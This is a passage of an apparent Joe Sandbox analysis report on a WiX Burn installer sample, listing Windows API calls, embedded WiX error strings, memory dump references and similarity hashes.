                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastSystemWindows
                                                                                                                                                                                                                                                                            • String ID: Failed to alloc Windows directory path.$Failed to concat subdirectory on Windows directory path.$Failed to get Windows directory path with default size.$Failed to get Windows directory path with returned size.$Failed to realloc Windows directory path.$Failed to terminate Windows directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 505562763-519864416
                                                                                                                                                                                                                                                                            • Opcode ID: 59583cd8f04abf657e6300083a1b6209c3de66bf278842b143bb2138c5001a0f
                                                                                                                                                                                                                                                                            • Instruction ID: 7dd28cc58d24c1c9596730136c23cfc2ab743f265e1381d8163dae018b87980d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59583cd8f04abf657e6300083a1b6209c3de66bf278842b143bb2138c5001a0f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8411733A80735B7D72157548C4AFAF296CFF41B54F528120FE44BB292E7649D0096E1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemWow64DirectoryW.KERNEL32(?,00000105,?,00000105), ref: 008E4A67
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4A73
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to terminate system wow64 directory path with backslash., xrefs: 008E4B65
                                                                                                                                                                                                                                                                            • Failed to get system wow64 directory path with returned size., xrefs: 008E4B3E
                                                                                                                                                                                                                                                                            • Failed to get max length of input buffer., xrefs: 008E4A4A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 008E4A97, 008E4A9D, 008E4AAE, 008E4B33, 008E4B38, 008E4B74
                                                                                                                                                                                                                                                                            • Failed to allocate space for system wow64 directory., xrefs: 008E4AC9
                                                                                                                                                                                                                                                                            • Failed to get system wow64 directory path with default size., xrefs: 008E4AA3
                                                                                                                                                                                                                                                                            • Failed to realloc system wow64 directory path., xrefs: 008E4AF0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastSystemWow64
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for system wow64 directory.$Failed to get max length of input buffer.$Failed to get system wow64 directory path with default size.$Failed to get system wow64 directory path with returned size.$Failed to realloc system wow64 directory path.$Failed to terminate system wow64 directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1255099494-3047029672
                                                                                                                                                                                                                                                                            • Opcode ID: 762aab71758511b5f57915100a47149fdf5e34527ebbd857658a400695f9388e
                                                                                                                                                                                                                                                                            • Instruction ID: 3ac45d42b70d4b1b8c7de5e4f260d405ee18cb87ebdcf48341946a01781050c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 762aab71758511b5f57915100a47149fdf5e34527ebbd857658a400695f9388e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2731F772A807B673D72156978C4EF5F695CFB83B75F121120BE08FB281E2A4DD0082A9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 008E4904
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E18D8,?,?,00000000,?,?,?,008E18B7,?,?,00000000,00000000), ref: 008E4910
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to terminate system directory path with backslash., xrefs: 008E4A00
                                                                                                                                                                                                                                                                            • Failed to get system directory path with returned size., xrefs: 008E49DA
                                                                                                                                                                                                                                                                            • Failed to allocate space for system directory., xrefs: 008E4966
                                                                                                                                                                                                                                                                            • Failed to get max length of input buffer., xrefs: 008E48E7
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 008E4934, 008E493A, 008E494B, 008E49CF, 008E49D4, 008E4A0F
                                                                                                                                                                                                                                                                            • Failed to get system directory path with default size., xrefs: 008E4940
                                                                                                                                                                                                                                                                            • Failed to realloc system directory path., xrefs: 008E498C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastSystem
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for system directory.$Failed to get max length of input buffer.$Failed to get system directory path with default size.$Failed to get system directory path with returned size.$Failed to realloc system directory path.$Failed to terminate system directory path with backslash.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3081803543-4099084807
                                                                                                                                                                                                                                                                            • Opcode ID: 8740f674ab0ce689832c27c433c433015df89852a0facb883bf3057e2b25806d
                                                                                                                                                                                                                                                                            • Instruction ID: 786fdc32d2f362af7ba5769f55252d6f1cf83dc4667fa2bdc46a7ece93338808
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8740f674ab0ce689832c27c433c433015df89852a0facb883bf3057e2b25806d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50311A72E803B677E73166568C4AF6F6D5CFB07B64F121130BE04FB2D2E6A49C0081A4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FE1DE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FE1EE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008FE305
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                            • String ID: %ls container from working path '%ls' to path '%ls'$Container has no verification information: %ls$Copying$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2528220319-1647781961
                                                                                                                                                                                                                                                                            • Opcode ID: 4388656c1ac1d3797724858e516b44002e72808b8fac17bb79f945acd0a2f5fc
                                                                                                                                                                                                                                                                            • Instruction ID: e8ea9f773b6511e33b404154911700d5d4ee7c0543843496f8b982494db87adc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4388656c1ac1d3797724858e516b44002e72808b8fac17bb79f945acd0a2f5fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E319C32540219BBEF225E95CC4AFBB3E29FF45B55F110114FF14BA1E1D2B1D82097A5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,8000FFFF,0094E7E8,00000000,00000000,00000000,00000000,8000FFFF,?,8000FFFF,8000FFFF,008E6DA2), ref: 008EB5E6
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008EB83F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to write variable name., xrefs: 008EB804
                                                                                                                                                                                                                                                                            • Failed to get numeric., xrefs: 008EB7B4
                                                                                                                                                                                                                                                                            • Failed to write variable value type., xrefs: 008EB7F0
                                                                                                                                                                                                                                                                            • Unsupported variable type., xrefs: 008EB784
                                                                                                                                                                                                                                                                            • Failed to get string., xrefs: 008EB7DC
                                                                                                                                                                                                                                                                            • Failed to write variable value as string., xrefs: 008EB7C8
                                                                                                                                                                                                                                                                            • Failed to write variable count., xrefs: 008EB603
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EB615, 008EB82A
                                                                                                                                                                                                                                                                            • Failed to write included flag., xrefs: 008EB818
                                                                                                                                                                                                                                                                            • Failed to write variable value as number., xrefs: 008EB7A0
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Failed to get numeric.$Failed to get string.$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3226335872
                                                                                                                                                                                                                                                                            • Opcode ID: 68084b3d4569d39ffc25722726a26d73b7e6b9a8f6a6eb7cea2f9fe4ed0c922b
                                                                                                                                                                                                                                                                            • Instruction ID: 01568d685c4a7fee9e2692f7ca2ff487266c811a356d87436a5ee1eb6cdaddda
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68084b3d4569d39ffc25722726a26d73b7e6b9a8f6a6eb7cea2f9fe4ed0c922b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B061E331A4036ABBDB22DE96CC46F9B7B68FF46755F104120FA00BA2D1D3B1DE509B91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$AllocClearInitString
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateDocument$failed put_preserveWhiteSpace$failed put_resolveExternals$failed put_validateOnParse$failed to allocate bstr for Path in XmlLoadDocumentFromFileEx$failed to load XML from: %ls
                                                                                                                                                                                                                                                                            • API String ID: 2213243845-3558707546
                                                                                                                                                                                                                                                                            • Opcode ID: 08a6d02b714b9d26b02453345cc258135cbc5fdead422b239f776ea78dcbe31f
                                                                                                                                                                                                                                                                            • Instruction ID: da15da35137e32066c4ad692fba9ed21c08bfb114063084264555ded5655900d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08a6d02b714b9d26b02453345cc258135cbc5fdead422b239f776ea78dcbe31f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B511836B40715BBEB15DF64CC4AF5E77A9BFC5B10F058065FA04EB381EAB09A018B91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(68056A00,?,00000000,?,008E80B3,?,?,?,?), ref: 008E7792
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00010068,?,00000000,?,008E80B3,?,?,?,?), ref: 008E77A9
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(008E876B,?,00000000,?,008E80B3,?,?,?,?), ref: 008E77BC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(5468FFFF,?,008E80B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E77CF
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(53009525,?,008E80B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E77E6
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(E850C094,008E879F,008E87BB,?,008E80B3,?,?,?,?), ref: 008E7825
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(008E817F,008E84EF,008E879F,008E87BB,?,008E80B3,?,?,?,?), ref: 008E7844
                                                                                                                                                                                                                                                                              • Part of subcall function 00939966: LocalFree.KERNEL32(008E7FB7,?,008E7764,d:\a\wix4\wix4\src\burn\engine\variable.cpp,?,00000000,?,008E80B3,?,?,?,?), ref: 00939970
                                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(008E87D7,008E828B,008E80F3,008E829F,008E8293,008E81AB,008E815B,008E8133,008E82C3,008E84D3,008E843B,008E8163,?,008E80B3,?,?), ref: 008E79B6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CriticalDeleteSection$FreeLocal
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\burn\engine\variable.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 352808245-2538428059
                                                                                                                                                                                                                                                                            • Opcode ID: 165ad6b3a2d089094a6cfce045c1ddd2681311a92cd3f7bb86ac66ad72b4cfbf
                                                                                                                                                                                                                                                                            • Instruction ID: 34f09aa6879dcf6030fe0017f7bb5654675ceeda79e8d1343b516d370195b0e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 165ad6b3a2d089094a6cfce045c1ddd2681311a92cd3f7bb86ac66ad72b4cfbf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D6153B0A04B85ABCA20FBBAC849E97B3EDFF56340F440819B95AD7111DB34F910DB21
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,008E6CF2,00000000,00000000,00000000), ref: 009452A2
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00020019,00000000,008E6CF2,00000000,00000000,00000000), ref: 009452B5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to add the dependent key "%ls" to the string array., xrefs: 009452D7
                                                                                                                                                                                                                                                                            • Failed to enumerate the dependents key of "%ls"., xrefs: 009452FF
                                                                                                                                                                                                                                                                            • Failed to check the dictionary of ignored dependents., xrefs: 00945210
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 00945112
                                                                                                                                                                                                                                                                            • Failed to get the name of the dependent from the key "%ls"., xrefs: 009452EB
                                                                                                                                                                                                                                                                            • Failed to open the registry key for dependents of "%ls"., xrefs: 009451C4
                                                                                                                                                                                                                                                                            • Failed to open the registry key "%ls". The dependency store is corrupt., xrefs: 0094516F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945121, 0094521F, 0094530E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$lstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to add the dependent key "%ls" to the string array.$Failed to allocate the registry key for dependency "%ls".$Failed to check the dictionary of ignored dependents.$Failed to enumerate the dependents key of "%ls".$Failed to get the name of the dependent from the key "%ls".$Failed to open the registry key "%ls". The dependency store is corrupt.$Failed to open the registry key for dependents of "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000003,?,?,0093A94F,?,?), ref: 008E32DB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0093A94F,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 008E32E7
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,0093A94F,?,00000000,00000000,00000000,00000000,00000003,?,?,0093A94F,?,?), ref: 008E33E6
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0093A94F,?,?,00000000,0000FDE9,?,008E7B05,00000003), ref: 008E33F0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                            • String ID: Not enough memory to allocate string of size: %u$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\strutil.cpp$failed to allocate string, len: %u$failed to convert to ansi: %ls$failed to get required size for conversion to ANSI: %ls$failed to get size of destination string
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000001,00000000,00000001,00000000,008E6DA2,008E6CF2,00020006,00000000,00000000,00000000,00000001,00000000,008E6DA2,009031C1,00000000,00000000), ref: 009458FE
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(008E6DA2,00000000,00000001,00000000,008E6DA2,008E6CF2,00020006,00000000,00000000,00000000,00000001,00000000,008E6DA2,009031C1,00000000,00000000), ref: 0094591C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate dependent subkey "%ls" under dependency "%ls"., xrefs: 009457FF
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to "%ls"., xrefs: 00945874, 009458A5
                                                                                                                                                                                                                                                                            • Failed to create the dependency subkey "%ls"., xrefs: 00945833
                                                                                                                                                                                                                                                                            • Failed to create the dependency registry key "%ls"., xrefs: 009457C8
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 00945781
                                                                                                                                                                                                                                                                            • %ls\%ls, xrefs: 009457E5
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945790, 00945842, 009458E8
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to %d., xrefs: 009458D9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$lstrlen
                                                                                                                                                                                                                                                                            • String ID: %ls\%ls$Failed to allocate dependent subkey "%ls" under dependency "%ls".$Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to create the dependency subkey "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000,00000001,BundleUpgradeCode,00000000,008E6DA2,00000000,00000000,00000001,0090303D,?,878D30FF,00902F8D,00000000,00903085,67E85650,008E6CF2), ref: 0093D849
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,0090303D,00000001,00000000,0090303D,00000001,BundleUpgradeCode,00000000), ref: 0093D8D2
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,878D30FF,00902F8D,00000000,00903085,67E85650,008E6CF2,0090303D,00000001,00902F8D), ref: 0093D95B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate space for string while writing REG_MULTI_SZ, xrefs: 0093D876
                                                                                                                                                                                                                                                                            • DWORD Overflow while adding length of string to write REG_MULTI_SZ, xrefs: 0093D887
                                                                                                                                                                                                                                                                            • Failed to get total string size in bytes, xrefs: 0093D914
                                                                                                                                                                                                                                                                            • Failed to set registry value to array of strings (first string of which is): %ls, xrefs: 0093D98B
                                                                                                                                                                                                                                                                            • BundleUpgradeCode, xrefs: 0093D82A
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0093D896, 0093D937, 0093D97F, 0093D984, 0093D99A
                                                                                                                                                                                                                                                                            • failed to copy string: %ls, xrefs: 0093D928
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$Value
                                                                                                                                                                                                                                                                            • String ID: BundleUpgradeCode$DWORD Overflow while adding length of string to write REG_MULTI_SZ$Failed to allocate space for string while writing REG_MULTI_SZ$Failed to get total string size in bytes$Failed to set registry value to array of strings (first string of which is): %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp$failed to copy string: %ls
                                                                                                                                                                                                                                                                            • API String ID: 198323757-1095722736
                                                                                                                                                                                                                                                                            • Opcode ID: 70067a82d5fe33554bea01e4183eec6a0565628c4516e616c97848a6a59f1d80
                                                                                                                                                                                                                                                                            • Instruction ID: 62596fe4455fe5e7c9aa04331dc28f619d23b564e78c63d5db95abf175a49655
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70067a82d5fe33554bea01e4183eec6a0565628c4516e616c97848a6a59f1d80
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2841D472A41319BBEB11DF59DC5AF6F36BDEB85B04F110069FA05AB280D6B09E008B61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,8000FFFF,?,?,00000000,?,?), ref: 008FB371
                                                                                                                                                                                                                                                                              • Part of subcall function 009434CC: ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,008FC427,?,?,00000004,?,00000004), ref: 009434F1
                                                                                                                                                                                                                                                                              • Part of subcall function 009434CC: GetLastError.KERNEL32(?,?,008FC427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009434FB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read verification process id from parent pipe., xrefs: 008FB46B
                                                                                                                                                                                                                                                                            • Verification secret from parent does not match., xrefs: 008FB445
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\pipe.cpp, xrefs: 008FB3B7, 008FB3C2, 008FB3DC, 008FB432, 008FB43D, 008FB4B1, 008FB4DF, 008FB4EA
                                                                                                                                                                                                                                                                            • Verification secret from parent is too big., xrefs: 008FB3CA
                                                                                                                                                                                                                                                                            • Verification process id from parent does not match., xrefs: 008FB4F2
                                                                                                                                                                                                                                                                            • Failed to read size of verification secret from parent pipe., xrefs: 008FB38F
                                                                                                                                                                                                                                                                            • Failed to allocate buffer for verification secret., xrefs: 008FB3F3
                                                                                                                                                                                                                                                                            • Failed to inform parent process that child is running., xrefs: 008FB49F
